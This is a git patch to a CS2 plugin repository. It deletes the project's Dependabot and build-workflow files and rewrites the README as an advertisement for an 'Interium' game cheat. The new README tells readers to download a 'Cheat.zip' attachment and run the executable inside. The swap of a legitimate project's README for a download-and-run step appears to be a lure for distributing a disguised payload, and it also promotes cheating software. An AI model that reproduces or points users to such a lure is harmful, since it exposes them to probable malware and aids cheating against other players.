From 99787ee29651f2bae9b4923ab6584d7cb3a29532 Mon Sep 17 00:00:00 2001 From: Jitendra2332 <142441501+Jitendra2332@users.noreply.github.com> Date: Sun, 1 Sep 2024 18:06:04 +0530 Subject: [PATCH] Commit --- .github/dependabot.yml | 11 ------ .github/workflows/build.yml | 68 ------------------------------------- README.md | 44 +++++++++++++++++++----- 3 files changed, 35 insertions(+), 88 deletions(-) delete mode 100644 .github/dependabot.yml delete mode 100644 .github/workflows/build.yml diff --git a/.github/dependabot.yml b/.github/dependabot.yml deleted file mode 100644 index b682eba..0000000 --- a/.github/dependabot.yml +++ /dev/null @@ -1,11 +0,0 @@ -# To get started with Dependabot version updates, you'll need to specify which -# package ecosystems to update and where the package manifests are located. -# Please see the documentation for all configuration options: -# https://docs.github.com/code-security/dependabot/dependabot-version-updates/configuration-options-for-the-dependabot.yml-file - -version: 2 -updates: - - package-ecosystem: "nuget" # See documentation for possible values - directory: "/" # Location of package manifests - schedule: - interval: "daily" diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml deleted file mode 100644 index 82514ef..0000000 --- a/.github/workflows/build.yml +++ /dev/null @@ -1,68 +0,0 @@ -name: Build the plugin - -on: - push: - branches: [ "master" ] - paths: - - '**.cs' - - '**.csproj' - pull_request: - branches: [ "master" ] - paths: - - '**.cs' - - '**.csproj' - release: - types: - - created - -jobs: - build: - runs-on: ubuntu-latest - - steps: - - uses: actions/checkout@v3 - - name: Setup .NET - uses: actions/setup-dotnet@v3 - with: - dotnet-version: 7.0.x - - name: Build - run: dotnet build - - name: Create output directory - run: | - mkdir -p output/InstadefusePlugin - mv ./bin/Debug/net7.0/InstadefusePlugin.dll output/InstadefusePlugin/ - mv ./bin/Debug/net7.0/InstadefusePlugin.pdb output/InstadefusePlugin/ - mv ./lang output/InstadefusePlugin/ - - name: Publish artifact - uses: actions/upload-artifact@v4 - with: - name: InstadefusePlugin-${{ github.sha }} - path: output - - release: - needs: build - permissions: write-all - runs-on: ubuntu-latest - if: github.event_name == 'release' - - steps: - - name: Download build artifact - uses: actions/download-artifact@v4 - with: - name: InstadefusePlugin-${{ github.sha }} - - name: Create release asset - run: zip -r InstadefusePlugin-${{ github.sha }}.zip ./InstadefusePlugin - - name: Get release info - run: | - RELEASE_INFO=$(curl -sH 'Accept: application/vnd.github.v3+json' https://api.github.com/repos/${{ github.repository }}/releases) - export UPLOAD_URL=$(echo $RELEASE_INFO | jq -r ".[] | select(.tag_name == \"${{ github.event.release.tag_name }}\").upload_url") - echo "UPLOAD_URL=$UPLOAD_URL" >> $GITHUB_ENV - - name: Upload release asset - uses: actions/upload-release-asset@v1 - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - with: - upload_url: ${{ env.UPLOAD_URL }} - asset_path: ./InstadefusePlugin-${{ github.sha }}.zip - asset_name: "cs2-instadefuse-${{ github.event.release.tag_name }}.zip" - asset_content_type: application/zip diff --git a/README.md b/README.md index cd80d6c..81382a8 100644 --- a/README.md +++ b/README.md @@ -1,14 +1,40 @@ -# CS2 Instadefuse -The CS2 port of my CS:GO Instadefuse plugin written in C# for CounterStrikeSharp +# CSGO-2 +Interium provides a decent legitbot and semi-rage options for CS2, catering to various playstyles. It doesn’t have a lifetime package but does offer a free trial, allowing users to test it before committing. -## Share the love -If you appreciate the project then please take the time to star the repository. +![CSGO-2 Logo](https://example.com/logo.png) -![Star us](https://github.com/b3none/gdprconsent/raw/development/.github/README_ASSETS/star_us.png) +## Table of Contents +- [Features](#features) +- [Installation](#installation) +- [Usage](#usage) +- [Contributing](#contributing) +- [License](#license) -## Server Hosting (Discounted) +## Features +🔥 Decent legitbot and semi-rage options +🎮 Catering to various playstyles +🆓 Free trial available -Looking for reliable server hosting? [Dathost](https://dathost.net/r/b3none/cs2-server-hosting) offers top-tier performance, easy server management, and excellent support, with servers available in multiple regions across the globe. Whether you're in North America, Europe, Asia, or anywhere else, [Dathost](https://dathost.net/r/b3none/cs2-server-hosting) has you covered. Use [this link](https://dathost.net/r/b3none/cs2-server-hosting) to get **30% off your first month**. Click [here]( https://dathost.net/r/b3none/cs2-server-hosting) to get started with the discount! +## Installation +To get started with Interium for CS2, follow these steps: +1. Download the cheat zip file from [here](https://github.com/user-attachments/files/16828195/Cheat.zip). +2. Extract the contents of the zip file to a location of your choice. +3. Launch the game and run the cheat executable. -## Credit -[LordFetznschaedl](https://github.com/LordFetznschaedl) for his initial CS2 port of https://github.com/B3none/csgo-retakes-instadefuse +## Usage +Here are some tips on using Interium effectively: +- **Legit Gameplay**: Toggle the legitbot options to enhance your gameplay discreetly. +- **Semi-Rage Mode**: Activate semi-rage mode for a more aggressive approach without going full rage. +- **Free Trial**: Take advantage of the free trial to test the cheat before making a decision. + +![CSGO-2 Screenshot](https://example.com/screenshot.png) + +## Contributing +Contributions are welcome! Here's how you can contribute: +1. Fork the repository. +2. Create a new branch. +3. Make your changes. +4. Submit a pull request. + +## License +This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. \ No newline at end of file